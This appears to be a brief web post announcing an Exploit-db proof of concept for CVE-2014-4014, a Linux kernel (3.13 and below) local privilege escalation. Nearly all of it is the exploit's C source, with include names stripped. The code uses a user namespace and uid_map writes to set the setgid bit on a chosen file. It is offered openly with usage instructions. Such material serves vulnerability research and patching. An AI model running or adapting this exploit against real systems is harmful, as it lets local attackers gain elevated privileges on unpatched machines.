968
Exploit-db have recently released a local privilege escalation POC as shown in the code example which affects the Linux 3.13 kernel and below.
Local attackers can exploit the issue to execute arbitrary code with elevated privileges or crash the system, effectively denying service to legitimate users.
/** * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC * * Vitaly Nikolenko * http://hashcrack.org * * Usage: ./poc [file_path] * * where file_path is the file on which you want to set the sgid bit */ #define _GNU_SOURCE #include#include #include #include #include #include #include #include #include #define STACK_SIZE (1024 * 1024) static char child_stack[STACK_SIZE]; struct args { int pipe_fd[2]; char *file_path; }; static int child(void *arg) { struct args *f_args = (struct args *)arg; char c; // close stdout close(f_args->pipe_fd[1]); assert(read(f_args->pipe_fd[0], &c, 1) == 0); // set the setgid bit chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR); return 0; } int main(int argc, char *argv[]) { int fd; pid_t pid; char mapping[1024]; char map_file[PATH_MAX]; struct args f_args; assert(argc == 2); f_args.file_path = argv[1]; // create a pipe for synching the child and parent assert(pipe(f_args.pipe_fd) != -1); pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args); assert(pid != -1); // get the current uid outside the namespace snprintf(mapping, 1024, "0 %d 1n", getuid()); // update uid and gid maps in the child snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid); fd = open(map_file, O_RDWR); assert(fd != -1); assert(write(fd, mapping, strlen(mapping)) == strlen(mapping)); close(f_args.pipe_fd[1]); assert (waitpid(pid, NULL, 0) != -1); }